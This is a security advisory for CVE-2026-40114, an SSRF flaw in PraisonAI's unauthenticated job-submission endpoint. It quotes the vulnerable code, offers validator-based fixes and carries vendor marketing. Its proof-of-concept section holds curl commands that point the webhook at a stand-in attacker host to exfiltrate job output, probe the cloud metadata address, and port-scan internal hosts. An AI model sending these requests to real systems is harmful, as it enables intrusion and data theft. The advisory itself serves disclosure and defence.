Summary
The /api/v1/runs endpoint accepts an arbitrary webhook_url in the request body with no URL validation. When a submitted job completes (success or failure), the server makes an HTTP POST request to this URL using httpx.AsyncClient. An unauthenticated attacker can use this to make the server send POST requests to arbitrary internal or external destinations, enabling SSRF against cloud metadata services, internal APIs, and other network-adjacent services.
Details
The vulnerability exists across the full request lifecycle:
1. User input accepted without validation, models.py:32:
class JobSubmitRequest(BaseModel):
webhook_url: Optional[str] = Field(None, description="URL to POST results when complete")
The field is a plain str with no URL validation, no scheme restriction, no host filtering.
2. Stored directly on the Job object, router.py:80-86:
job = Job(
prompt=body.prompt,
...
webhook_url=body.webhook_url,
...
)
3. Used in an outbound HTTP request, executor.py:385-415:
async def _send_webhook(self, job: Job):
if not job.webhook_url:
return
try:
import httpx
payload = {
"job_id": job.id,
"status": job.status.value,
"result": job.result if job.status == JobStatus.SUCCEEDED else None,
"error": job.error if job.status == JobStatus.FAILED else None,
...
}
async with httpx.AsyncClient(timeout=30.0) as client:
response = await client.post(
job.webhook_url, # <-- attacker-controlled URL
json=payload,
headers={"Content-Type": "application/json"}
)
4. Triggered on both success and failure paths, executor.py:180-205:
# Line 180-181: on success
if job.webhook_url:
await self._send_webhook(job)
# Line 204-205: on failure
if job.webhook_url:
await self._send_webhook(job)
5. No authentication on the Jobs API server, server.py:82-101:
The create_app() function creates a FastAPI app with CORS allowing all origins (["*"]) and no authentication middleware. The jobs router is mounted directly with no auth dependencies.
There is zero URL validation anywhere in the chain: no scheme check (allows http://, https://, and any scheme httpx supports), no private/internal IP filtering, and no allowlist.
PoC
Step 1: Start a listener to observe SSRF requests
# In a separate terminal, start a simple HTTP listener
python3 -c "
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(length)
print(f'Received POST from PraisonAI server:')
print(json.dumps(json.loads(body), indent=2))
self.send_response(200)
self.end_headers()
HTTPServer(('0.0.0.0', 9999), Handler).serve_forever()
"
Step 2: Submit a job with a malicious webhook_url
# Point webhook to attacker-controlled server
curl -X POST http://localhost:8005/api/v1/runs \
-H 'Content-Type: application/json' \
-d '{
"prompt": "say hello",
"webhook_url": "http://attacker.example.com:9999/steal"
}'
Step 3: Target internal services (cloud metadata)
# Attempt to reach AWS metadata service
curl -X POST http://localhost:8005/api/v1/runs \
-H 'Content-Type: application/json' \
-d '{
"prompt": "say hello",
"webhook_url": "http://169.254.169.254/latest/meta-data/"
}'
Step 4: Internal network port scanning
# Scan internal services by observing response timing
for port in 80 443 5432 6379 8080 9200; do
curl -s -X POST http://localhost:8005/api/v1/runs \
-H 'Content-Type: application/json' \
-d "{
\"prompt\": \"say hello\",
\"webhook_url\": \"http://10.0.0.1:${port}/\"
}"
done
When each job completes, the server POSTs the full job result payload (including agent output, error messages, and execution metrics) to the specified URL.
Impact
SSRF to internal services: The server will send POST requests to any host/port reachable from the server's network, allowing interaction with internal APIs, databases, and cloud infrastructure that are not meant to be externally accessible.
Cloud metadata access: In cloud deployments (AWS, GCP, Azure), the server can be directed to POST to metadata endpoints (
169.254.169.254,metadata.google.internal), potentially triggering actions or leaking information depending on the metadata service's POST handling.Internal network reconnaissance: By submitting jobs with webhook URLs pointing to various internal hosts and ports, an attacker can discover internal services based on timing differences and error patterns in job logs.
Data exfiltration: The webhook payload includes the full job result (agent output), which may contain sensitive data processed by the agent. By pointing the webhook to an attacker-controlled server, this data is exfiltrated.
No authentication barrier: The Jobs API server has no authentication by default, meaning any network-reachable attacker can exploit this without credentials.
Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.
CVE-2026-40114 has a CVSS score of 7.2 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.5.128); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Add URL validation to restrict webhook URLs to safe destinations. In models.py, add a Pydantic validator:
from pydantic import BaseModel, Field, field_validator
from urllib.parse import urlparse
import ipaddress
class JobSubmitRequest(BaseModel):
webhook_url: Optional[str] = Field(None, description="URL to POST results when complete")
@field_validator("webhook_url")
@classmethod
def validate_webhook_url(cls, v: Optional[str]) -> Optional[str]:
if v is None:
return v
parsed = urlparse(v)
# Only allow http and https schemes
if parsed.scheme not in ("http", "https"):
raise ValueError("webhook_url must use http or https scheme")
# Block private/internal IP ranges
hostname = parsed.hostname
if not hostname:
raise ValueError("webhook_url must have a valid hostname")
try:
ip = ipaddress.ip_address(hostname)
if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
raise ValueError("webhook_url must not point to private/internal addresses")
except ValueError as e:
if "must not point" in str(e):
raise
# hostname is not an IP, resolve and check
pass
return v
Additionally, in executor.py, add DNS resolution validation before making the request to prevent DNS rebinding:
async def _send_webhook(self, job: Job):
if not job.webhook_url:
return
# Validate resolved IP is not private (prevent DNS rebinding)
from urllib.parse import urlparse
import socket, ipaddress
parsed = urlparse(job.webhook_url)
try:
resolved_ip = socket.getaddrinfo(parsed.hostname, parsed.port or 443)[0][4][0]
ip = ipaddress.ip_address(resolved_ip)
if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
logger.warning(f"Webhook blocked for {job.id}: resolved to private IP {resolved_ip}")
return
except (socket.gaierror, ValueError):
logger.warning(f"Webhook blocked for {job.id}: could not resolve {parsed.hostname}")
return
# ... proceed with httpx.AsyncClient.post() ...
Frequently Asked Questions
- What is CVE-2026-40114? CVE-2026-40114 is a high-severity server-side request forgery (SSRF) vulnerability in PraisonAI (pip), affecting versions < 4.5.128. It is fixed in 4.5.128. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
- How severe is CVE-2026-40114? CVE-2026-40114 has a CVSS score of 7.2 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of PraisonAI are affected by CVE-2026-40114? PraisonAI (pip) versions < 4.5.128 is affected.
- Is there a fix for CVE-2026-40114? Yes. CVE-2026-40114 is fixed in 4.5.128. Upgrade to this version or later.
- Is CVE-2026-40114 exploitable, and should I be worried? Whether CVE-2026-40114 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-40114 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-40114? Upgrade
PraisonAIto 4.5.128 or later.